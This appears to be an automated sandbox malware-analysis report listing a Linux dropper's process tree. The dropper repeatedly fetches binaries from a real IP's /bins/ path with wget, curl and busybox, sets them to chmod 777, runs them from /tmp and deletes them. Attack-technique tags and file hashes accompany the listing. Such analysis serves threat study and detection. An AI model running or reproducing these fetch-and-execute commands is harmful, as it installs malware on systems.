/bin/chmodchmod 777 c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV2⤵
- File and Directory Permissions Modification
PID:942
-
-
/tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV./c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV2⤵
- Executes dropped EXE
PID:943
-
-
/bin/rmrm c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV2⤵PID:944
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC2⤵PID:945
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:946
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC2⤵PID:947
-
-
/bin/chmodchmod 777 fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC2⤵
- File and Directory Permissions Modification
PID:948
-
-
/tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC./fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC2⤵
- Executes dropped EXE
PID:949
-
-
/bin/rmrm fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC2⤵PID:950
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe2⤵PID:951
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:952
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe2⤵PID:953
-
-
/bin/chmodchmod 777 l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe2⤵
- File and Directory Permissions Modification
PID:954
-
-
/tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe./l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe2⤵
- Executes dropped EXE
PID:955
-
-
/bin/rmrm l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe2⤵PID:956
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB2⤵
- System Network Configuration Discovery
PID:957
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:958
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB2⤵
- System Network Configuration Discovery
PID:959
-
-
/bin/chmodchmod 777 vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB2⤵
- File and Directory Permissions Modification
PID:960
-
-
/tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB./vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:961
-
-
/bin/rmrm vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB2⤵
- System Network Configuration Discovery
PID:962
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr2⤵PID:963
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:964
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr2⤵PID:965
-
-
/bin/chmodchmod 777 mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr2⤵
- File and Directory Permissions Modification
PID:966
-
-
/tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr./mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr2⤵
- Executes dropped EXE
PID:967
-
-
/bin/rmrm mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr2⤵PID:968
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm2⤵PID:969
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:970
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm2⤵PID:971
-
-
/bin/chmodchmod 777 EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm2⤵
- File and Directory Permissions Modification
PID:972
-
-
/tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm./EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm2⤵
- Executes dropped EXE
PID:973
-
-
/bin/rmrm EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm2⤵PID:974
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr2⤵PID:975
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:976
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr2⤵PID:977
-
-
/bin/chmodchmod 777 Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr2⤵
- File and Directory Permissions Modification
PID:978
-
-
/tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr./Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr2⤵
- Executes dropped EXE
PID:979
-
-
/bin/rmrm Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr2⤵PID:980
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC2⤵PID:981
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:982
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC2⤵PID:983
-
-
/bin/chmodchmod 777 PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC2⤵
- File and Directory Permissions Modification
PID:984
-
-
/tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC./PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC2⤵
- Executes dropped EXE
PID:985
-
-
/bin/rmrm PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC2⤵PID:986
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97